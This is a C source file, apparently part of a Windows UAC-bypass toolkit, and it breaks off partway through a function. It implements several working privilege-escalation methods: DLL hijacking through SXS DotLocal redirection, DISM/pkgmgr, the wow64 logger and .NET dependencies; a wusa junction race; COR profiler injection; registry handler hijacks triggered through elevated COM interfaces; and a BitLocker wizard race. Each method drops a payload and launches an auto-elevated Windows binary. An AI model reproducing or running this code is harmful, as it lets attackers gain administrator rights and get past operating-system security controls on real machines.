RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot); _strcat(szBuffer, L"\\winsxs\\"); _strcpy(szDirBuf, szBuffer); _strcat(szBuffer, L"*"); RtlSecureZeroMemory(&fdata, sizeof(fdata)); hFindFile = FindFirstFile(szBuffer, &fdata); if (hFindFile != INVALID_HANDLE_VALUE) { do { if ((fdata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && (fdata.cFileName[0] != L'.') ) { if (_strstri(fdata.cFileName, INETMGR_SXS) != NULL) { _strcpy(szBuffer, szDirBuf); _strcat(szBuffer, fdata.cFileName); bScanResult = ucmxScanFiles( szBuffer, L"*.exe", (UCMX_FIND_FILE_CALLBACK)&ucmInetMgrFindCallback, ProxyDll, ProxyDllSize); if (bScanResult) { MethodResult = STATUS_SUCCESS; break; } } } } while (FindNextFile(hFindFile, &fdata)); FindClose(hFindFile); } } while (FALSE); return MethodResult; } /* * ucmSXSMethod * * Purpose: * * Exploit SXS Local Redirect feature. * * SXS/Fusion uses dll redirection, attempting to load internal manifest dependencies from * non existent directory (this is so called DotLocal dll redirection), it is trying to do this * before going to WinSXS store. * * In this case dependency is Microsoft.Windows.Common-Controls. * * Maybe you think it is handy cool feature, but I think its another backdoor from lazy dotnet crew. * "You keep shipping crap, and crap, and more crap". * */ NTSTATUS ucmSXSMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize, _In_opt_ LPWSTR lpTargetDirectory, //single element in system32 with slash at end _In_ LPWSTR lpTargetApplication, //executable name _In_opt_ LPWSTR lpLaunchApplication, //executable name, must be in same dir as lpTargetApplication _In_ BOOL bConsentItself ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; WCHAR *lpszFullDllPath = NULL, *lpszDirectoryName = NULL; SIZE_T sz; LPWSTR lpSxsPath = NULL; WCHAR szSrc[MAX_PATH * 2], szDst[MAX_PATH * 2]; SXS_SEARCH_CONTEXT sctx; if (lpTargetApplication == NULL) return STATUS_INVALID_PARAMETER_3; if (_strlen(lpTargetApplication) > MAX_PATH) return STATUS_INVALID_PARAMETER_3; do { //common part, locate sxs dll, drop payload to temp RtlSecureZeroMemory(szSrc, sizeof(szSrc)); RtlSecureZeroMemory(szDst, sizeof(szDst)); sz = UNICODE_STRING_MAX_BYTES; lpszFullDllPath = (WCHAR*)supVirtualAlloc( &sz, DEFAULT_ALLOCATION_TYPE, DEFAULT_PROTECT_TYPE, NULL); if (lpszFullDllPath == NULL) break; sctx.DllName = COMCTL32_DLL; sctx.SxsKey = COMCTL32_SXS; sctx.FullDllPath = lpszFullDllPath; if (!sxsFindLoaderEntry(&sctx)) break; lpszDirectoryName = _filename(lpszFullDllPath); if (lpszDirectoryName == NULL) break; sz = PAGE_SIZE + (_strlen(lpszDirectoryName) * sizeof(WCHAR)); lpSxsPath = (LPWSTR)supVirtualAlloc( &sz, DEFAULT_ALLOCATION_TYPE, DEFAULT_PROTECT_TYPE, NULL); if (lpSxsPath == NULL) break; //drop payload dll _strcpy(szSrc, g_ctx->szTempDirectory); _strcat(szSrc, COMCTL32_DLL); if (!supWriteBufferToFile(szSrc, ProxyDll, ProxyDllSize)) break; _strcpy(lpSxsPath, g_ctx->szSystemDirectory); if (lpTargetDirectory) { _strcat(lpSxsPath, lpTargetDirectory); } _strcpy(szDst, lpTargetApplication); // // Workaround for consent, so it won't ban itself. // Create all files and target directories with fake root name. // Next when all fileop is done, rename fake root to real. // if (bConsentItself) { _strcat(szDst, FAKE_LOCAL_SXS); } else { _strcat(szDst, LOCAL_SXS); } //create local directory if (!ucmMasqueradedCreateSubDirectoryCOM(lpSxsPath, szDst)) break; //create assembly directory _strcat(lpSxsPath, szDst); if (!ucmMasqueradedCreateSubDirectoryCOM(lpSxsPath, lpszDirectoryName)) break; //move payload file _strcat(lpSxsPath, TEXT("\\")); _strcat(lpSxsPath, lpszDirectoryName); if (!ucmMasqueradedMoveFileCOM(szSrc, lpSxsPath)) break; // // Consent workaround end. // Restore real directory name. // if (bConsentItself) { _strcpy(lpSxsPath, g_ctx->szSystemDirectory); if (lpTargetDirectory) { _strcat(lpSxsPath, lpTargetDirectory); } _strcat(lpSxsPath, lpTargetApplication); _strcat(lpSxsPath, FAKE_LOCAL_SXS); _strcpy(szDst, lpTargetApplication); _strcat(szDst, LOCAL_SXS); if (!ucmMasqueradedRenameElementCOM(lpSxsPath, szDst)) break; } //run target process _strcpy(szDst, g_ctx->szSystemDirectory); if (lpTargetDirectory) { _strcat(szDst, lpTargetDirectory); } if (lpLaunchApplication) { _strcat(szDst, lpLaunchApplication); } else { _strcat(szDst, lpTargetApplication); } if (supRunProcess(szDst, NULL)) MethodResult = STATUS_SUCCESS; } while (FALSE); if (lpszFullDllPath) supVirtualFree(lpszFullDllPath, NULL); if (lpSxsPath) supVirtualFree(lpSxsPath, NULL); return MethodResult; } /* * ucmSXSMethodCleanup * * Purpose: * * Post execution cleanup routine for SXSMethod. * */ BOOL ucmSXSMethodCleanup( _In_ BOOL bConsentItself ) { WCHAR szBuffer[MAX_PATH * 2]; _strcpy(szBuffer, g_ctx->szSystemDirectory); if (bConsentItself) { _strcat(szBuffer, CONSENT_EXE); } else { _strcat(szBuffer, SYSPREP_DIR); _strcat(szBuffer, SYSPREP_EXE); } _strcat(szBuffer, LOCAL_SXS); return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer); } /* * ucmDismMethod * * Purpose: * * Exploit DISM application dll loading scheme. * * Dism.exe located in system32 folder while it dlls are in system32\dism * When loaded dism first attempt to load dlls from system32 folder. * * Trigger: pkgmgr.exe * PkgMgr.exe is autoelevated whitelisted application which is actually just calling Dism.exe * */ NTSTATUS ucmDismMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; BOOL bNeedCleanup = FALSE; WCHAR szSource[MAX_PATH * 2], szDest[MAX_PATH * 2]; do { //put target dll RtlSecureZeroMemory(szSource, sizeof(szSource)); _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, DISMCORE_DLL); //write proxy dll to disk if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) { break; } bNeedCleanup = TRUE; _strcpy(szDest, g_ctx->szSystemDirectory); if (!ucmMasqueradedMoveFileCOM(szSource, szDest)) break; _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, PACKAGE_XML); //write package data to disk if (!supDecodeAndWriteBufferToFile(szSource, (CONST PVOID)&g_encodedPackageData, sizeof(g_encodedPackageData), AKAGI_XOR_KEY2)) { break; } _strcpy(szDest, g_ctx->szSystemDirectory); _strcat(szDest, PKGMGR_EXE); _strcpy(szSource, TEXT("/n:")); _strcat(szSource, g_ctx->szTempDirectory); _strcat(szSource, PACKAGE_XML); if (supRunProcess(szDest, szSource)) MethodResult = STATUS_SUCCESS; } while (FALSE); // // Cleanup temp. // if (bNeedCleanup) { _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, DISMCORE_DLL); DeleteFile(szSource); _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, PACKAGE_XML); DeleteFile(szSource); } return MethodResult; } /* * ucmWow64LoggerMethod * * Purpose: * * Bypass UAC using wow64 logger dll and wow64 application. * * Trigger: 32bit version of wusa.exe * Loader will map and call our logger dll during wow64 process initialization. * */ NTSTATUS ucmWow64LoggerMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; WCHAR szTarget[MAX_PATH * 2]; // // Build target application full path. // We need autoelevated application from syswow64 folder ONLY. // _strcpy(szTarget, USER_SHARED_DATA->NtSystemRoot); _strcat(szTarget, SYSWOW64_DIR); _strcat(szTarget, WUSA_EXE); if (ucmGenericAutoelevation(szTarget, WOW64LOG_DLL, ProxyDll, ProxyDllSize)) { MethodResult = STATUS_SUCCESS; // // Attempt to remove payload dll after execution in method.c!PostCleanupAttempt. // Warning: every wow64 application will load payload code (some will crash). // Remove file IMMEDIATELY after work. // } return MethodResult; } /* * ucmUiAccessMethod * * Purpose: * * Bypass UAC using uiAccess(true) application. * Original method source * https://habrahabr.ru/company/pm/blog/328008/ * */ NTSTATUS ucmUiAccessMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; SIZE_T Length; DWORD DllVirtualSize; LPWSTR lpEnv = NULL, lpTargetDll; PVOID EntryPoint, DllBase; PIMAGE_NT_HEADERS NtHeaders; UNICODE_STRING uStr = RTL_CONSTANT_STRING(L"ProgramFiles="); WCHAR szTarget[MAX_PATH * 2]; WCHAR szSource[MAX_PATH * 2]; do { // // There is no osksupport.dll in Windows 7. // if (g_ctx->dwBuildNumber < 9200) lpTargetDll = DUSER_DLL; else lpTargetDll = OSKSUPPORT_DLL; // // Replace default Fubuki dll entry point with new. // NtHeaders = RtlImageNtHeader(ProxyDll); if (NtHeaders == NULL) { MethodResult = STATUS_INVALID_IMAGE_FORMAT; break; } DllVirtualSize = 0; DllBase = PELoaderLoadImage(ProxyDll, &DllVirtualSize); if (DllBase) { // // Get the new entrypoint. // EntryPoint = PELoaderGetProcAddress(DllBase, FUBUKI_EXT_ENTRYPOINT); if (EntryPoint) { // // Set new entrypoint and recalculate checksum. // NtHeaders->OptionalHeader.AddressOfEntryPoint = (ULONG)((ULONG_PTR)EntryPoint - (ULONG_PTR)DllBase); NtHeaders->OptionalHeader.CheckSum = supCalculateCheckSumForMappedFile(ProxyDll, ProxyDllSize); } VirtualFree(DllBase, 0, MEM_RELEASE); } else { MethodResult = STATUS_IMAGE_NOT_AT_BASE; break; } // // Drop modified fubuki.dll to the %temp% // RtlSecureZeroMemory(szSource, sizeof(szSource)); _strcpy(szSource, g_ctx->szTempDirectory); _strcat(szSource, lpTargetDll); if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) break; // // Build target path in g_lpIncludePFDirs // lpEnv = supQueryEnvironmentVariableOffset(&uStr); if (lpEnv == NULL) break; Length = _strlen(lpEnv); if ((Length == 0) || (Length > MAX_PATH)) break; RtlSecureZeroMemory(&szTarget, sizeof(szTarget)); _strncpy(szTarget, MAX_PATH, lpEnv, MAX_PATH); _strcat(szTarget, TEXT("\\")); _strcat(szTarget, T_WINDOWSMEDIAPLAYER); _strcat(szTarget, TEXT("\\")); // // In case if Media Player is not installed / available. // Note: additional check of g_lpIncludedPFDirs? // if (!PathFileExists(szTarget)) { if (!ucmMasqueradedCreateSubDirectoryCOM(lpEnv, T_WINDOWSMEDIAPLAYER)) break; } // // Copy Fubuki to target directory. // if (!ucmMasqueradedMoveFileCOM(szSource, szTarget)) break; // // Copy osk.exe to Program Files\Windows Media Player // RtlSecureZeroMemory(szSource, sizeof(szSource)); _strcpy(szSource, g_ctx->szSystemDirectory); _strcat(szSource, OSK_EXE); if (!ucmMasqueradedMoveCopyFileCOM(szSource, szTarget, FALSE)) break; // // Run uiAccess osk.exe from Program Files. // _strcat(szTarget, OSK_EXE); if (supRunProcess2(szTarget, NULL, NULL, SW_SHOW, FALSE)) { // // Run eventvwr.exe as final trigger. // Spawns mmc.exe with eventvwr.msc snap-in. // _strcpy(szTarget, g_ctx->szSystemDirectory); _strcat(szTarget, EVENTVWR_EXE); if (supRunProcess2(szTarget, NULL, NULL, SW_SHOW, FALSE)) MethodResult = STATUS_SUCCESS; } } while (FALSE); return MethodResult; } /* * ucmJunctionMethod * * Purpose: * * Bypass UAC using two different steps: * * 1) Create wusa.exe race condition and force wusa to copy files to the protected directory using NTFS reparse point. * 2) Dll hijack dotnet dependencies. * * Wusa race condition in combination with junctions found by Thomas Vanhoutte. * */ NTSTATUS ucmJunctionMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; BOOL bDropComplete = FALSE, bWusaNeedCleanup = FALSE; HKEY hKey = NULL; LRESULT lResult; LPWSTR lpTargetDirectory = NULL, lpEnd = NULL; DWORD i, cValues = 0, cbMaxValueNameLen = 0, bytesIO; WCHAR szBuffer[MAX_PATH * 2]; WCHAR szSource[MAX_PATH * 2]; do { // // Drop payload dll to %temp% and make cab for it. // RtlSecureZeroMemory(szSource, sizeof(szSource)); _strcpy(szSource, g_ctx->szTempDirectory); if (g_ctx->dwBuildNumber < 9600) { _strcat(szSource, OLE32_DLL); } else { _strcat(szSource, MSCOREE_DLL); } bWusaNeedCleanup = ucmCreateCabinetForSingleFile(szSource, ProxyDll, ProxyDllSize, NULL); if (!bWusaNeedCleanup) break; // // Locate target directory. // lResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_DOTNET_CLIENT, 0, MAXIMUM_ALLOWED, &hKey); if (lResult != ERROR_SUCCESS) break; lResult = RegQueryInfoKey(hKey, NULL, NULL, NULL, NULL, NULL, NULL, &cValues, &cbMaxValueNameLen, NULL, NULL, NULL); if (lResult != ERROR_SUCCESS) break; if ((cValues == 0) || (cbMaxValueNameLen == 0)) break; if (cbMaxValueNameLen > MAX_PATH) break; bDropComplete = FALSE; // // Drop file in each. // for (i = 0; i < cValues; i++) { RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); bytesIO = MAX_PATH; lResult = RegEnumValue(hKey, i, (LPWSTR)&szBuffer, &bytesIO, NULL, NULL, NULL, NULL); lpTargetDirectory = _filepath(szBuffer, szBuffer); if (lpTargetDirectory == NULL) { bDropComplete = FALSE; break; } lpEnd = _strend(lpTargetDirectory); if (*(lpEnd - 1) == TEXT('\\')) *(lpEnd - 1) = TEXT('\0'); if (!ucmWusaExtractViaJunction(lpTargetDirectory)) { bDropComplete = FALSE; break; } bDropComplete = TRUE; } if (!bDropComplete) break; // // Exploit dll hijacking. // RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, DCOMCNFG_EXE); if (supRunProcess(szBuffer, NULL)) MethodResult = STATUS_SUCCESS; } while (FALSE); if (hKey != NULL) RegCloseKey(hKey); if (bWusaNeedCleanup) { // // Remove cabinet file if exist. // ucmWusaCabinetCleanup(); } return MethodResult; } /* * ucmJunctionMethodCleanup * * Purpose: * * Post execution cleanup routine for JunctionMethod. * */ BOOL ucmJunctionMethodCleanup( VOID ) { BOOL bResult = FALSE; HKEY hKey = NULL; LRESULT lResult; LPWSTR lpTargetDirectory = NULL, lpEnd = NULL, lpTargetDll = NULL; DWORD i, cValues = 0, cbMaxValueNameLen = 0, bytesIO; WCHAR szBuffer[MAX_PATH * 2]; do { if (g_ctx->dwBuildNumber < 9600) { lpTargetDll = OLE32_DLL; } else { lpTargetDll = MSCOREE_DLL; } // // Locate target directory. // lResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_DOTNET_CLIENT, 0, MAXIMUM_ALLOWED, &hKey); if (lResult != ERROR_SUCCESS) break; lResult = RegQueryInfoKey(hKey, NULL, NULL, NULL, NULL, NULL, NULL, &cValues, &cbMaxValueNameLen, NULL, NULL, NULL); if (lResult != ERROR_SUCCESS) break; if ((cValues == 0) || (cbMaxValueNameLen == 0)) break; if (cbMaxValueNameLen > MAX_PATH) break; // // Delete target file in each. // for (i = 0; i < cValues; i++) { RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); bytesIO = MAX_PATH; lResult = RegEnumValue(hKey, i, (LPWSTR)&szBuffer, &bytesIO, NULL, NULL, NULL, NULL); lpTargetDirectory = _filepath(szBuffer, szBuffer); if (lpTargetDirectory == NULL) { break; } lpEnd = _strend(lpTargetDirectory); if (*(lpEnd - 1) != TEXT('\\')) _strcat(lpEnd, TEXT("\\")); _strcat(szBuffer, lpTargetDll); if (ucmMasqueradedDeleteDirectoryFileCOM(szBuffer)) { OutputDebugString(szBuffer); } } bResult = TRUE; } while (FALSE); return bResult; } /* * ucmSXSDccwMethod * * Purpose: * * Similar to ucmSXSMethod, except using different target app and dll. * Dccw idea by Ernesto Fernandez (https://github.com/L3cr0f/DccwBypassUAC) * */ NTSTATUS ucmSXSDccwMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; BOOL bWusaNeedCleanup = FALSE; HMODULE hGdiPlus = NULL; WCHAR *lpszFullDllPath = NULL, *lpszDirectoryName = NULL; SIZE_T sz; LPWSTR lpSxsPath = NULL, lpEnd; WCHAR szBuffer[MAX_PATH * 2], szTarget[MAX_PATH * 2]; SXS_SEARCH_CONTEXT sctx; do { // // Check if target app available. Maybe unavailable in server edition. // #ifndef _DEBUG _strcpy(szTarget, g_ctx->szSystemDirectory); _strcat(szTarget, DCCW_EXE); if (!PathFileExists(szTarget)) { MethodResult = STATUS_OBJECT_NAME_NOT_FOUND; break; } #endif //_DEBUG // // Load GdiPlus in our address space to get it full path. // RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, GDIPLUS_DLL); hGdiPlus = LoadLibrary(szBuffer); if (hGdiPlus == NULL) { MethodResult = STATUS_DLL_NOT_FOUND; break; } sz = UNICODE_STRING_MAX_BYTES; lpszFullDllPath = (WCHAR*)supVirtualAlloc( &sz, DEFAULT_ALLOCATION_TYPE, DEFAULT_PROTECT_TYPE, NULL); if (lpszFullDllPath == NULL) break; sctx.DllName = GDIPLUS_DLL; sctx.SxsKey = GDIPLUS_SXS; sctx.FullDllPath = lpszFullDllPath; if (!sxsFindLoaderEntry(&sctx)) { MethodResult = STATUS_SXS_KEY_NOT_FOUND; break; } lpszDirectoryName = _filename(lpszFullDllPath); if (lpszDirectoryName == NULL) break; sz = PAGE_SIZE + (_strlen(lpszDirectoryName) * sizeof(WCHAR)); lpSxsPath = (LPWSTR)supVirtualAlloc( &sz, DEFAULT_ALLOCATION_TYPE, DEFAULT_PROTECT_TYPE, NULL); if (lpSxsPath == NULL) break; // // Create DotLocal path. // _strcpy(lpSxsPath, DCCW_EXE); _strcat(lpSxsPath, LOCAL_SXS); _strcat(lpSxsPath, TEXT("\\")); _strcat(lpSxsPath, lpszDirectoryName); _strcat(lpSxsPath, TEXT("\\")); _strcat(lpSxsPath, GDIPLUS_DLL); // // Create fake cab file. // RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, g_ctx->szTempDirectory); _strcat(szBuffer, GDIPLUS_DLL); bWusaNeedCleanup = ucmCreateCabinetForSingleFile( szBuffer, ProxyDll, ProxyDllSize, lpSxsPath); if (!bWusaNeedCleanup) break; _strcpy(szBuffer, g_ctx->szSystemDirectory); lpEnd = _strend(szBuffer); if (*(lpEnd - 1) == TEXT('\\')) *(lpEnd - 1) = TEXT('\0'); if (!ucmWusaExtractViaJunction(szBuffer)) break; Sleep(2000); // // Run target. // if (supRunProcess(szTarget, NULL)) MethodResult = STATUS_SUCCESS; } while (FALSE); // // Cleanup resources. // if (hGdiPlus != NULL) FreeLibrary(hGdiPlus); if (lpszFullDllPath) supVirtualFree(lpszFullDllPath, NULL); if (lpSxsPath) supVirtualFree(lpSxsPath, NULL); if (bWusaNeedCleanup) ucmWusaCabinetCleanup(); return MethodResult; } /* * ucmSXSDccwMethodCleanup * * Purpose: * * Post execution cleanup routine for SXSDccwMethod. * */ BOOL ucmSXSDccwMethodCleanup( VOID ) { WCHAR szBuffer[MAX_PATH * 2]; _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, DCCW_EXE); _strcat(szBuffer, LOCAL_SXS); return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer); } /* * ucmCorProfilerMethod * * Purpose: * * Bypass UAC using COR profiler. * http://seclists.org/fulldisclosure/2017/Jul/11 * */ NTSTATUS ucmCorProfilerMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; SIZE_T sz = 0; GUID guid; HKEY hKey = NULL; LRESULT lResult; LPOLESTR OutputGuidString = NULL; WCHAR szBuffer[MAX_PATH * 2], szRegBuffer[MAX_PATH * 4]; do { // // Create unique GUID // if (CoCreateGuid(&guid) != S_OK) break; if (StringFromCLSID(&guid, &OutputGuidString) != S_OK) break; _strcpy(szBuffer, g_ctx->szTempDirectory); _strcat(szBuffer, MYSTERIOUSCUTETHING); _strcat(szBuffer, TEXT(".dll")); if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize)) break; supSetEnvVariable(FALSE, NULL, COR_ENABLE_PROFILING, TEXT("1")); supSetEnvVariable(FALSE, NULL, COR_PROFILER, OutputGuidString); if (g_ctx->dwBuildNumber >= 9200) { supSetEnvVariable(FALSE, NULL, COR_PROFILER_PATH, szBuffer); } else { // // On Windows 7 target written on 3+ dotnet, registration required. // _strcpy(szRegBuffer, T_REG_SOFTWARECLASSESCLSID); _strcat(szRegBuffer, OutputGuidString); _strcat(szRegBuffer, T_REG_INPROCSERVER32); hKey = NULL; lResult = RegCreateKeyEx(HKEY_CURRENT_USER, szRegBuffer, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL); if (lResult == ERROR_SUCCESS) { sz = (1 + _strlen(szBuffer)) * sizeof(WCHAR); lResult = RegSetValueEx( hKey, TEXT(""), 0, REG_SZ, (BYTE*)szBuffer, (DWORD)sz); if (lResult == ERROR_SUCCESS) { RtlSecureZeroMemory(&szRegBuffer, sizeof(szRegBuffer)); _strcpy(szRegBuffer, T_APARTMENT); sz = (1 + _strlen(szRegBuffer)) * sizeof(WCHAR); RegSetValueEx( hKey, T_THREADINGMODEL, 0, REG_SZ, (BYTE*)szRegBuffer, (DWORD)sz); } RegCloseKey(hKey); } } // // Load target app and trigger cor profiler, eventvwr snap-in is written in the dotnet. // if (supRunProcess2(MMC_EXE, EVENTVWR_MSC, NULL, SW_SHOW, FALSE)) MethodResult = STATUS_SUCCESS; } while (FALSE); // // Cleanup. // if (OutputGuidString != NULL) { supSetEnvVariable(TRUE, NULL, COR_PROFILER, NULL); CoTaskMemFree(OutputGuidString); } supSetEnvVariable(TRUE, NULL, COR_ENABLE_PROFILING, NULL); if (g_ctx->dwBuildNumber >= 9200) supSetEnvVariable(TRUE, NULL, COR_PROFILER_PATH, NULL); return MethodResult; } /* * ucmFwCplLuaMethod * * Purpose: * * Bypass UAC using FwCplLua undocumented COM interface and mscfile registry hijack. * This function expects that supMasqueradeProcess was called on process initialization. * * Fixed in Windows 10 RS4. * */ NTSTATUS ucmFwCplLuaMethod( _In_ LPWSTR lpszPayload ) { BOOL bSymLinkCleanup = FALSE; DWORD dwKeyDisposition = 0; NTSTATUS MethodResult = STATUS_ACCESS_DENIED; HRESULT r = E_FAIL, hr_init; LRESULT lResult; HKEY hKey = NULL; SIZE_T sz = 0; IFwCplLua *FwCplLua = NULL; WCHAR szKey[MAX_PATH + 1]; hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); do { #ifdef _DEBUG g_ctx->MethodExecuteType = ucmExTypeIndirectModification; #endif RtlSecureZeroMemory(szKey, sizeof(szKey)); sz = _strlen(lpszPayload); if (sz == 0) { MethodResult = STATUS_INVALID_PARAMETER; break; } // // Create controlled mscfile entry. // _strcpy(szKey, T_MSC_SHELL); _strcat(szKey, T_SHELL_OPEN_COMMAND); lResult = RegCreateKeyEx(HKEY_CURRENT_USER, szKey, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, &dwKeyDisposition); if (lResult != ERROR_SUCCESS) break; // // Set "Default" value as our payload. // sz = (1 + sz) * sizeof(WCHAR); lResult = ERROR_ACCESS_DENIED; switch (g_ctx->MethodExecuteType) { case ucmExTypeIndirectModification: if (supIndirectRegAdd(REG_HKCU, szKey, NULL, NULL, lpszPayload)) { lResult = ERROR_SUCCESS; } break; case ucmExTypeRegSymlink: if (NT_SUCCESS(supRegSetValueIndirectHKCU( szKey, NULL, lpszPayload, (ULONG)sz))) { bSymLinkCleanup = TRUE; lResult = ERROR_SUCCESS; } break; case ucmExTypeDefault: default: lResult = RegSetValueEx( hKey, TEXT(""), 0, REG_SZ, (BYTE*)lpszPayload, (DWORD)sz); break; } RegCloseKey(hKey); hKey = NULL; if (lResult != ERROR_SUCCESS) break; // // Get elevated COM object for FwCplLua interface. // r = ucmAllocateElevatedObject( T_CLSID_FwCplLua, &IID_IFwCplLua, CLSCTX_LOCAL_SERVER, &FwCplLua); if (r != S_OK) break; if (FwCplLua == NULL) { r = E_OUTOFMEMORY; break; } // // Execute method from FwCplLua interface. // This will trigger our payload as shell will attempt to run it. // r = FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua); if (SUCCEEDED(r)) MethodResult = STATUS_SUCCESS; } while (FALSE); if (hKey != NULL) RegCloseKey(hKey); if (FwCplLua != NULL) { FwCplLua->lpVtbl->Release(FwCplLua); } if (hr_init == S_OK) CoUninitialize(); // // Remove symlink. // if (bSymLinkCleanup) supRemoveRegLinkHKCU(); // // Remove key with all subkeys. // if (dwKeyDisposition == REG_CREATED_NEW_KEY) supRegDeleteKeyRecursive(HKEY_CURRENT_USER, T_MSC_SHELL); return MethodResult; } /* * ucmDccwCOMMethod * * Purpose: * * Bypass UAC using ColorDataProxy/CCMLuaUtil undocumented COM interfaces. * This function expects that supMasqueradeProcess was called on process initialization. * */ NTSTATUS ucmDccwCOMMethod( _In_ LPWSTR lpszPayload ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; HRESULT r = E_FAIL, hr_init; BOOL bIntApproved1 = FALSE, bIntApproved2 = FALSE; SIZE_T sz = 0; ICMLuaUtil *CMLuaUtil = NULL; IColorDataProxy *ColorDataProxy = NULL; hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); do { // // Potential fix check. // if (supIsConsentApprovedInterface(T_CLSID_ColorDataProxy, &bIntApproved1)) { if (supIsConsentApprovedInterface(T_CLSID_CMSTPLUA, &bIntApproved2)) if ((bIntApproved1 == FALSE) || (bIntApproved2 == FALSE)) { if (ucmShowQuestion(UACFIX) != IDYES) { MethodResult = STATUS_CANCELLED; break; } } } sz = _strlen(lpszPayload); if (sz == 0) { MethodResult = STATUS_INVALID_PARAMETER; break; } // // Create elevated COM object for CMLuaUtil. // r = ucmAllocateElevatedObject( T_CLSID_CMSTPLUA, &IID_ICMLuaUtil, CLSCTX_LOCAL_SERVER, &CMLuaUtil); if (r != S_OK) { break; } if (CMLuaUtil == NULL) { r = E_OUTOFMEMORY; break; } // // Write new custom calibrator value to HKLM. // r = CMLuaUtil->lpVtbl->SetRegistryStringValue(CMLuaUtil, HKEY_LOCAL_MACHINE, T_DISPLAY_CALIBRATION, T_CALIBRATOR_VALUE, lpszPayload); if (FAILED(r)) { break; } // // Create elevated COM object for ColorDataProxy. // r = ucmAllocateElevatedObject( T_CLSID_ColorDataProxy, &IID_IColorDataProxy, CLSCTX_LOCAL_SERVER, &ColorDataProxy); if (r != S_OK) { break; } if (ColorDataProxy == NULL) { r = E_OUTOFMEMORY; break; } // // Run our "custom calibrator". // r = ColorDataProxy->lpVtbl->LaunchDccw(ColorDataProxy, 0); if (SUCCEEDED(r)) MethodResult = STATUS_SUCCESS; Sleep(1000); // // Remove calibrator value. // CMLuaUtil->lpVtbl->DeleteRegistryStringValue(CMLuaUtil, HKEY_LOCAL_MACHINE, T_DISPLAY_CALIBRATION, T_CALIBRATOR_VALUE); } while (FALSE); if (CMLuaUtil != NULL) { CMLuaUtil->lpVtbl->Release(CMLuaUtil); } if (ColorDataProxy != NULL) { ColorDataProxy->lpVtbl->Release(ColorDataProxy); } if (hr_init == S_OK) CoUninitialize(); return MethodResult; } /* * ucmBitlockerRCMethod * * Purpose: * * Bypass UAC using BitlockerWizardElev race condition. * * Fixed in Windows 10 RS4 * */ NTSTATUS ucmBitlockerRCMethod( _In_ LPWSTR lpszPayload ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; #ifndef _WIN64 NTSTATUS Status; #endif BOOL bNeedCleanup = FALSE; HKEY hKey = NULL; LRESULT lResult; DWORD cbData = 0; WCHAR szKey[MAX_PATH]; WCHAR szTargetApp[MAX_PATH * 2]; SHELLEXECUTEINFO shinfo; #ifndef _WIN64 if (g_ctx->IsWow64) { Status = supEnableDisableWow64Redirection(TRUE); if (!NT_SUCCESS(Status)) return Status; } #endif #ifndef _DEBUG _strcpy(szTargetApp, g_ctx->szSystemDirectory); _strcat(szTargetApp, BITLOCKERWIZARDELEV_EXE); if (!PathFileExists(szTargetApp)) return STATUS_OBJECT_NAME_NOT_FOUND; #endif // // Create or open target key. // _strcpy(szKey, T_EXEFILE_SHELL); _strcat(szKey, T_SHELL_OPEN_COMMAND); lResult = RegCreateKeyEx(HKEY_CURRENT_USER, szKey, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL); if (lResult == ERROR_SUCCESS) { // // Launch target application and suspend it. // RtlSecureZeroMemory(&shinfo, sizeof(shinfo)); shinfo.cbSize = sizeof(shinfo); shinfo.fMask = SEE_MASK_NOCLOSEPROCESS; shinfo.lpFile = szTargetApp; shinfo.lpParameters = TEXT("X: P F"); shinfo.lpDirectory = NULL; shinfo.nShow = SW_SHOW; if (ShellExecuteEx(&shinfo)) { NtSuspendProcess(shinfo.hProcess); // // Set new exefile handler. // cbData = (DWORD)((1 + _strlen(lpszPayload)) * sizeof(WCHAR)); lResult = RegSetValueEx( hKey, TEXT(""), 0, REG_SZ, (BYTE*)lpszPayload, cbData); bNeedCleanup = (lResult == ERROR_SUCCESS); if (bNeedCleanup) RegFlushKey(hKey); // // Resume target application. // NtResumeProcess(shinfo.hProcess); if 